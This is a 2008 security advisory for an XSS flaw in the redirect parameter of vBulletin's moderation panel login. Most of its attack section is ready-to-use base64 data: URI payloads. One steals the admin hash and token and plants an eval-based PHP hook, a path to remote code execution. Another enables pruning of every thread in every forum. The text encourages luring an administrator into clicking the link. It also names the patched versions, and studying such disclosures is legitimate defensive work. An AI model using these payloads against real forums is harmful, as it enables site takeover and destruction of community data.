|
======================================================================
Advisory : XSS in modcp index
Release Date : June 17th 2008
Application : vBulletin
Version : vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1 and lower
Platform : PHP
Vendor URL : http://www.vbulletin.com/
Authors : Jessica Hope (jessicasaulhope@googlemail.com),
Friends who wish to remain anonymous.
=======================================================================
Overview
Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.
=======================================================================
Discussion
The XSS in question exists on the login page for the MCP (moderation
control panel).
The login script takes a redirect parameter that lacks sanitation, allowing a
rather easy XSS:
http://localhost/vB3/modcp/index.php?redirect={XSS}
What is even better is that the exploit will work outright if the
admin/moderator is already logged in;
if the admin/moderator is not, they will be required to log in.
However, if an admin
logs into the MCP, he is also logged into the ACP, allowing the same
exploit as last time
(remote PHP code injection via the hooks system).
If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin/moderator is logged in. A simple example of the above:
http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
In this case (as per the last case as well), you have an unlimited and
unaltered XSS space,
so you're free to invoke some AJAX and have fun.
Just to give ideas on how this could turn into something larger,
vBulletin has hooks that operate using eval(), and new hooks can
be added via the ACP itself. It is trivial to write some JS that not only
enables hooks but also inserts a nice RFI hook. Here's one using the data
URI:
data:text/html;base64,
PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlb
nQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW
4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWR
kJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2Nh
bGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyK
HIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW
5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1
ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGlu
Zm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJ
ywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SG
VhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9
vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3RvO3Iy
PSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0S
GVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3
NjcmlwdD4K
The above will survive a login prompt. It will then, once executed, proceed
to parse one of the ACP pages and extract the admin hash and token, then
it will enable hooks and add one that executes phpinfo().
Obviously the above requires an admin in this context. Similar techniques
could be used to exploit the modcp as usual, banning users, enabling the
pruning of threads etc.
If you want to cause annoyance, you can esally exploit just a
moderator (and thus have more
success in the exploit being run). This example enables pruning for
all forums on all posts:
data:text/html;base64,
PHNjcmlwdD5ldmFsKCJ2PSdodHRwOi8vbG9jYWxob3N0L3ZCL21vZGNwL3RocmVhZC5waHA/ZG89Jzt1P
SdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udG
VudC1sZW5ndGgnO3JlZz1uZXcgWE1MSHR0cFJlcXVlc3QoKTtyZWcub3BlbignR0VUJyx2KydwcnVuZSc
sZmFsc2UpO3JlZy5zZW5kKG51bGwpO3I9cmVnLnJlc3BvbnNlVGV4dDtoPScmYWRtaW5oYXNoPScrci5z
dWJzdHIoci5pbmRleE9mKCdoYXNoXCInKSsxMywzMik7dG89JyZzZWN1cml0eXRva2VuPScrci5zdWJzd
HIoci5pbmRleE9mKCd0b2tlblwiJykrMTQsNDApO3M9J3RocmVhZFsnO3QyPXMrJ29yaWdpbmFsZGF5c2
9sZGVyXT0wJicrcysnb3JpZ2luYWxkYXlzbmV3ZXJdPTAmJytzKydsYXN0ZGF5c29sZGVyXT0wJicrcys
nbGFzdGRheXNuZXdlcl09MCYnK3MrJ3JlcGxpZXNsZWFzdF09MCYnK3MrJ3JlcGxpZXNtb3N0XT0tMSYn
K3MrJ3ZpZXdzbGVhc3RdPTAmJytzKyd2aWV3c21vc3RdPS0xJicrcysnaXNzdGlja3ldPS0xJicrcysnc
3RhdGVdPWFueSYnK3MrJ3N0YXR1c109YW55JicrcysnZm9ydW1pZF09LTEmJytzKydwb3N0ZWR1c2VyXT
0mJytzKyd0aXRsZWNvbnRhaW5zXT0mJytzKydzdWJmb3J1bXNdPTEmdHlwZT1wcnVuZSZkbz1kb3RocmV
hZHMnK2grdG87cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRz
JyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlc
ihjLHUpO3IyLnNlbmQodDIpO3g9cjIucmVzcG9uc2VUZXh0O3QyPSdkbz1kb3RocmVhZHNhbGwmdHlwZT
1wcnVuZSYnK2grdG8rJyZjcml0ZXJpYT0nK2VzY2FwZSgoeC5zdWJzdHIoeC5pbmRleE9mKCdyaWEnKSs
xMiw3NDcpKS5yZXBsYWNlKC8mcXVvdDsvZywnXCInKSk7cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIu
b3BlbignUE9TVCcsdisnZG90aHJlYWRzYWxsJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyL
mxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpOyIpOzwvc2NyaXB0Pg==
In order to exploit, just get an admin/moderator to click the link.
=======================================================================
Solution:
Update to 3.7.1 PL2 or 3.6.10 PL2
=======================================================================
|
